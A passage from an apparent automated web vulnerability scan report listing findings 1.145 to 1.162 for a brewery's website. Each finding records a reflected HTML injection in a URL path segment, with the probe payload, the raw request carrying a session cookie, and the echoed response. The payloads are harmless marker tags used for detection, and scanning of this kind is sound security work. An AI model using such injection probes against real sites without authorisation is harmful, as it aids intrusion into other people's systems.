Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebooke124c"><a>a5d48e2d007_page" class="facebooke124c">
...[SNIP]...

1.145. http://www.ninkasibrewing.com/facebook/content/img/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3145"><a>00514f46b2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooka3145"><a>00514f46b2c/content/img/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebooka3145"><a>00514f46b2c_page" class="facebooka3145">
...[SNIP]...

1.146. http://www.ninkasibrewing.com/facebook/content/img/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf7c"><a>481ef2418ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook9cf7c"><a>481ef2418ab/content/img/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook9cf7c"><a>481ef2418ab_page" class="facebook9cf7c">
...[SNIP]...

1.147. http://www.ninkasibrewing.com/facebook/content/img/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcbba"><a>275f83cf66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookdcbba"><a>275f83cf66/content/img/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookdcbba"><a>275f83cf66_page" class="facebookdcbba">
...[SNIP]...

1.148. http://www.ninkasibrewing.com/facebook/content/img/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6c44"><a>859f4735ae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf6c44"><a>859f4735ae1/content/img/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookf6c44"><a>859f4735ae1_page" class="facebookf6c44">
...[SNIP]...

1.149. http://www.ninkasibrewing.com/facebook/content/img/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f88bc"><a>053c5e72b0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf88bc"><a>053c5e72b0f/content/img/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookf88bc"><a>053c5e72b0f_page" class="facebookf88bc">
...[SNIP]...

1.150. http://www.ninkasibrewing.com/facebook/content/img/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2eb"><a>bc8073585ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookbb2eb"><a>bc8073585ab/content/img/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookbb2eb"><a>bc8073585ab_page" class="facebookbb2eb">
...[SNIP]...

1.151. http://www.ninkasibrewing.com/facebook/content/img/skin/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5800a"><a>a4b4f8152dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook5800a"><a>a4b4f8152dc/content/img/skin/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook5800a"><a>a4b4f8152dc_page" class="facebook5800a">
...[SNIP]...

1.152. http://www.ninkasibrewing.com/facebook/content/img/skin/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8d20"><a>cbd38bfb8dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf8d20"><a>cbd38bfb8dd/content/img/skin/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookf8d20"><a>cbd38bfb8dd_page" class="facebookf8d20">
...[SNIP]...

1.153. http://www.ninkasibrewing.com/facebook/content/img/skin/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc8c"><a>4b90a1eb6c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookacc8c"><a>4b90a1eb6c3/content/img/skin/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookacc8c"><a>4b90a1eb6c3_page" class="facebookacc8c">
...[SNIP]...

1.154. http://www.ninkasibrewing.com/facebook/content/img/skin/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6775"><a>0b1efea915c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookc6775"><a>0b1efea915c/content/img/skin/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookc6775"><a>0b1efea915c_page" class="facebookc6775">
...[SNIP]...

1.155. http://www.ninkasibrewing.com/facebook/content/img/skin/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b1f9"><a>3337eb96f99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook2b1f9"><a>3337eb96f99/content/img/skin/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook2b1f9"><a>3337eb96f99_page" class="facebook2b1f9">
...[SNIP]...

1.156. http://www.ninkasibrewing.com/facebook/content/img/skin/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e41c9"><a>38407733516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooke41c9"><a>38407733516/content/img/skin/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebooke41c9"><a>38407733516_page" class="facebooke41c9">
...[SNIP]...

1.157. http://www.ninkasibrewing.com/facebook/content/img/skin/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3d15"><a>6e87c3abe92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf3d15"><a>6e87c3abe92/content/img/skin/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookf3d15"><a>6e87c3abe92_page" class="facebookf3d15">
...[SNIP]...

1.158. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/ninkasi-random/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1184"><a>83d2b21934b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooka1184"><a>83d2b21934b/content/img/skin/ninkasi-random/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebooka1184"><a>83d2b21934b_page" class="facebooka1184">
...[SNIP]...

1.159. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/ninkasi-random/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0479"><a>259ace437e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookc0479"><a>259ace437e4/content/img/skin/ninkasi-random/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookc0479"><a>259ace437e4_page" class="facebookc0479">
...[SNIP]...

1.160. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/ninkasi-random/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d72d"><a>662f9a27440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook3d72d"><a>662f9a27440/content/img/skin/ninkasi-random/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook3d72d"><a>662f9a27440_page" class="facebook3d72d">
...[SNIP]...

1.161. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/ninkasi-random/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fbed"><a>b1ab901368a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook7fbed"><a>b1ab901368a/content/img/skin/ninkasi-random/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook7fbed"><a>b1ab901368a_page" class="facebook7fbed">
...[SNIP]...

1.162. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
